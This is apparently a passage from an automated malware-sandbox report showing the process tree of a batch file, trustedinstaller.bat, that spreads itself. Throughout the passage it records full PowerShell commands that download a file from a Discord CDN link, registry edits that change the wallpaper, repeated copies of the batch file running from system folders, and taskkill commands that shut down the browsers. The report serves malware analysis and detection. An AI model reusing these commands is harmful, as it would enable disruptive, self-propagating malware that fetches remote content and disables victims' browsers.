        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5552
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:4796
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:1576
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4924
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:6632
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:3640
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4328
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:5320
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:1896
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:2172
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:5820
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:8464
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:3372
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:5012
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:932
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:9284
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      PID:1520
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "firefox.exe"
      4⤵
      PID:6140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
    3⤵
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Drops file in Windows directory
    PID:2816
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2372
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3748
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:1092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:3148
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1856
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:4348
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6800
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:8800
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
        5⤵
        
        PID:8840
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
        5⤵
        
        PID:8004
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
        5⤵
        
        PID:9068
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
        5⤵
        
        PID:9076
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
        5⤵
        
        PID:8260
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "chrome.exe"
        5⤵
        Kills process with taskkill
        
        PID:8228
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:3772
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:1228
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:4028
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6912
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:3040
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:2720
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:1340
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:8728
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:2080
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3664
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:5200
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:3224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:2236
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Blocklisted process makes network request
        
        PID:3332
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        
        PID:5092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:3616
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3696
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:5660
    - - C:\Windows\system32\rundll32.exe
        
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        5⤵
        
        PID:6872
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      Kills process with taskkill
      PID:2944
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "firefox.exe"
      4⤵
      Kills process with taskkill
      PID:4072
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "msedge.exe"
      4⤵
      Kills process with taskkill
      PID:4600
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "chrome.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2212
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "firefox.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4052
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "msedge.exe"
    3⤵
    - Kills process with taskkill
    PID:4016
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "opera.exe"
    3⤵
    - Kills process with taskkill
    PID:3440
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im "brave.exe"
    3⤵
    PID:3136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
  2⤵
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:2776
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2676
- - C:\Windows\system32\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:2500
- - C:\Windows\system32\rundll32.exe
    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    3⤵
    PID:2688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
    3⤵
    PID:2844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1756
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:1332
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:6092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:3440
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:6072
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:6372
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:6108
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:7444
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:4344
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:4616
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:5552
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3504
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:4400
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:3468
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      Kills process with taskkill
      PID:5392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
    3⤵
    PID:3064
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2688
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:1044
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:5152
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:4708
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:2904
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:3936
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3300
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:2848
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:6400
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:7776
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:5612
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:5828
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:4700
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:7624
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      PID:2688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
    3⤵
    PID:1828
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2292
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3648
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:5336
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:3592
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:5988
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:3140
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:6832
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\BatchFile\trustedinstaller.bat"
      4⤵
      PID:6080
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
      4⤵
      PID:3436
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:6244
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\trustedinstaller.bat"
      4⤵
      PID:3924
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:5084
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\trustedinstaller.bat"
      4⤵
      PID:3720
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:7896
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im "chrome.exe"
      4⤵
      PID:6380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\PerfLogs\trustedinstaller.bat"
    3⤵
    PID:2144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1296
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\wallpaper.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:3640
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:2704
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Program Files\BatchFile\trustedinstaller.bat"
      4⤵
      PID:4728
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1210857012976680982/1265375003356958820/Untitled11_20240723222812.png?ex=66a147ce&is=669ff64e&hm=a5ecf1bc511891fb8e579dce5e1c76df281f970a2c4b3e920c861ca27b0b0ef7&', 'C:\Users\Admin\AppData\Local\Temp\wallpaper.png')"
        5⤵
        
        PID:7180
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Windows\System32\trustedinstaller.bat"
      4⤵
      PID:4860
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
